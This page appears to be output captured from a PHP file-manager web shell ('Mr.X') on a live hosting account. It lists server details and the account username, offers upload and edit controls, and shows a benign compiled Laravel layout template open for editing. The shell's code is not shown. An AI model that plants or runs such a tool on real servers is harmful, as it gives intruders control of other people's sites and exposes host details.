🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:2293d53f3c56c1d74faa90546e8e4334.php
<!DOCTYPE html> <html lang="<?php echo e(str_replace('_', '-', app()->getLocale())); ?>"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-token" content="<?php echo e(csrf_token()); ?>"> <title><?php echo e(config('app.name', 'Laravel')); ?></title> <!-- Fonts --> <link rel="preconnect" href="https://fonts.bunny.net"> <link href="https://fonts.bunny.net/css?family=figtree:400,500,600&display=swap" rel="stylesheet" /> <!-- Scripts --> <?php echo app('Illuminate\Foundation\Vite')(['resources/css/app.css', 'resources/js/app.js']); ?> </head> <body class="font-sans antialiased"> <div class="min-h-screen bg-gray-100"> <?php echo $__env->make('layouts.navigation', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?> <!-- Page Heading --> <?php if(isset($header)): ?> <header class="bg-white shadow"> <div class="max-w-7xl mx-auto py-6 px-4 sm:px-6 lg:px-8"> <?php echo e($header); ?> </div> </header> <?php endif; ?> <!-- Page Content --> <main> <?php echo e($slot); ?> </main> </div> </body> </html> <?php /**PATH /home/websparkit/public_html/clint.websparkit.com/laravel/resources/views/layouts/app.blade.php ENDPATH**/ ?>
Save Changes
Cancel
Create New File
Create New Folder